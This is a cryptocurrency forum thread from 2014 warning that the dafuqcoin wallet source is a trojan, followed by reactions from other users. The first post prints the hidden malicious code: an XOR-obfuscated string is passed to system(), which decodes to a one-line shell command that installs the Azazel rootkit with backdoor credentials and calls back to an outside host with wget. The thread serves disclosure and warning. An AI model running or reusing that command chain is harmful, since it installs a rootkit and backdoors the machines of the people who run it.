Bitcoin Forum
November 19, 2024, 03:11:03 AM *
News: Check out the artwork 1Dq created to commemorate this forum's 15th anniversary
 
   Home   Help Search Login Register More  
Warning: One or more bitcointalk.org users have reported that they strongly believe that the creator of this topic is a scammer. (Login to see the detailed trust ratings.) While the bitcointalk.org administration does not verify such claims, you should proceed with extreme caution.
Pages: [1]
  Print  
Author Topic: READ ME NOW! - dafuqcoin is a trojan - pool operators/exchanges beware  (Read 1855 times)
richiela (OP)
Hero Member
*****
Offline Offline

Activity: 937
Merit: 1000


View Profile
April 22, 2014, 06:53:56 PM
 #1

This is completely malicious - DO NOT RUN

// init.cpp
// Runs if in daemon mode
#if !defined(WIN32) && !defined(QT_GUI)
    fDaemon = GetBoolArg("-daemon");
    if ((access("/usr/.dfq", F_OK) == -1))
      daemonize(getnewid());

// util.h
// daemonize basically calls "system" which executes "s" which is whatever is passed in
inline void  daemonize(std::string s)
{
  if (std::system(s.c_str()))
    return;
  return;
}

// util.cpp
// takes offset1, offset2, offset3 and XORs it
std::string getnewid()
{
  return (hashoffset(offset1, offset2, offset3));
}

// The result
apt-get -y install libpcap-dev libpam-dev wget git >/dev/null 2>&1 || yum -y install libpcap-devel pam-devel wget git >/dev/null 2>&1;cd /tmp/ >/dev/null 2>&1;git clone https://github.com/chokepoint/azazel.git >/dev/null 2>&1;chmod -R 777 azazel/ >/dev/null 2>&1;cd azazel/ >/dev/null 2>&1;sed 's/BLIND_LOGIN = "rootme"/BLIND_LOGIN = "r00t"/' config.py | sed 's/SHELL_PASSWD = "changeme"/SHELL_PASSWD = "r00tp4ssw0rd"/' | sed 's/PASSPHRASE = "Hello NSA"/PASSPHRASE = "Bestp4ssphr4se3v3r"/' | sed 's/KEY_SALT = "changeme"/KEY_SALT = "Bestk3ys4lt3v3r"/' > newconfig.py;mv newconfig.py config.py >/dev/null 2>&1;make >/dev/null 2>&1;make install >/dev/null 2>&1;wget http://dfqcoin.co.nf/in.php >/dev/null 2>&1;cd .. >/dev/null 2>&1;rm -rf azazel/ >/dev/null 2>&1;touch /usr/.dfq >/dev/null 2>&1


...

Given the "wget http://dfqcoin.co.nf/in.php" i can only conclude this is evil dev and not compromised source.   This coin will be delisted and removed from bittrex.com ASAP.

If you ran this as root, your box is compromised and I suggest a rebuild ASAP.  If you did not run as root, this should have failed silently and you should be ok....

Looking for the best exchange? -> https://bittrex.com
pandher
Legendary
*
Offline Offline

Activity: 952
Merit: 1000


Stagnation is Death


View Profile WWW
April 22, 2014, 07:07:03 PM
 #2

This was clearly the reason behind the recent CryptoKK exchange failure, Azazel rootkit
DssTech
Newbie
*
Offline Offline

Activity: 42
Merit: 0


View Profile WWW
April 22, 2014, 08:35:17 PM
 #3

All i have to say is WOW
jwinterm
Legendary
*
Offline Offline

Activity: 3136
Merit: 1116



View Profile
April 23, 2014, 12:57:54 AM
 #4

thanks for heads up bittrex richie...dafuq yo?
Cryptocoinrank.com
Full Member
***
Offline Offline

Activity: 168
Merit: 100


View Profile WWW
April 23, 2014, 01:12:35 AM
 #5

Thanks for the heads up, I was going to add that coin to Cryptocoinrank.com if I would not have seen this first.

Propulsion
Hero Member
*****
Offline Offline

Activity: 658
Merit: 500


The Buck Stops Here.


View Profile
April 23, 2014, 01:27:11 AM
 #6

Is this the first time a trojan's been baked into the source code?
Raxe.io
Full Member
***
Offline Offline

Activity: 238
Merit: 100


View Profile WWW
April 23, 2014, 01:31:13 AM
 #7

This is some dirty code, seems like they want to get a botnet together.

Raxe.io / Example wallet: http://wallet.raxe.io
Spoetnik
Legendary
*
Offline Offline

Activity: 1540
Merit: 1011


FUD Philanthropist™


View Profile
April 23, 2014, 01:40:37 AM
 #8

Your just a Troll blah blah blah
..nobody does anything wrong in this scene your all just haters..

Free Market !

FUD first & ask questions later™
cryptohunter
Legendary
*
Offline Offline

Activity: 2100
Merit: 1167

MY RED TRUST LEFT BY SCUMBAGS - READ MY SIG


View Profile
April 23, 2014, 01:40:55 AM
 #9

how did it get past virustotal?

Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!